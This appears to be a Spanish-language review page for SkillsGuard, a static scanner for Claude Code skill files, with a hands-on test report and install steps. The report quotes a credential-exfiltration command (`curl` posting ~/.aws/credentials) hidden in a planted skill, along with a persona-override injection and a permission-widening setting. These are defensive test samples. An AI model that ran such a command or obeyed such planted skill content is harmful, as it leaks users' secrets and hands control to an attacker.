SkillsGuard

Escáner estático que audita un SKILL.md en busca de inyección, exfiltración y escalada

Por Teycir · Teycir/SkillsGuard

Funciona con configuración ★ 6.8/10

SkillsGuard — Escáner estático que audita un SKILL.md en busca de inyección, exfiltración y escalada

Qué hace

Dirige el escáner estático SkillsGuard — 15 categorías de reglas que cubren prompt injection, exfiltración, command injection, persistencia, escalada de privilegios, ofuscación y cadena de suministro — sobre una única skill o una carpeta completa de skills, luego formatea los hallazgos en un veredicto agrupado por severidad con una recomendación de instalación / no instalación. Decodifica base64 y otros blobs ofuscados antes de la coincidencia, por lo que las cargas útiles ocultas dentro de cadenas codificadas se informan con la evidencia decodificada. Se activa con solicitudes como scan this skill, is this skill safe, o audit my skills folder.

Informe de la prueba

El motor de decodificación primero es lo real: planté una skill cuyo setup.sh ocultaba `curl -X POST -d @<(cat ~/.aws/credentials)` dentro de un blob base64, y el escáner lo decodificó e informó la exfiltración de credenciales, la línea de ampliación de permisos de settings.json y la inyección de persona-override enterrada en un comentario HTML — 17 hallazgos en 16 ms, los tres ataques detectados. La precisión es el problema. Apuntado a una biblioteca real de 278 skills instaladas, emitió 15.480 hallazgos y calificó toda la carpeta como 100/100 CRITICAL, marcando 204 de 278 skills como HIGH o peor; las dos reglas más ruidosas coinciden con `rm` y `sh` sin límites de palabra, por lo que cualquier código markdown en línea que contenga 'format' o 'publish' se informa como command injection. Una skill inofensiva de toma de notas de 14 líneas cuyo único backtick era `--format markdown` regresó como MEDIUM con cinco hallazgos HIGH de 'command injection'. Tampoco está en npm — el SKILL.md por sí solo no hace nada, y debes clone, npm install, build y npm link (o conectar el servidor MCP) antes de que la skill tenga algo que llamar. Útil como un triaje rápido previo a la instalación en una skill sospechosa; no confíes en su veredicto a nivel de carpeta.

Probado el: 2026-08-07 · Claude Code 2.x (agent harness)

Instalación

git clone https://github.com/Teycir/SkillsGuard.git
mkdir -p ~/.claude/skills
cp -r SkillsGuard/skill ~/.claude/skills/skillsguard
# scanner CLI is a separate build: cd SkillsGuard && npm install && npm run build && npm link

Comandos y prompts de ejemplo

  • /skillsguardEscáner estático que audita un SKILL.md en busca de inyección, exfiltración y escalada

Los skills se activan con peticiones en lenguaje natural, sin comandos que memorizar. Tras instalarlo, prompts como estos lo activan (en inglés):

  • Can you scan this skill for prompt injection before I install it?
  • Is this Claude Code skill safe to install, any red flags?
  • Audit my whole ~/.claude/skills folder for exfiltration risks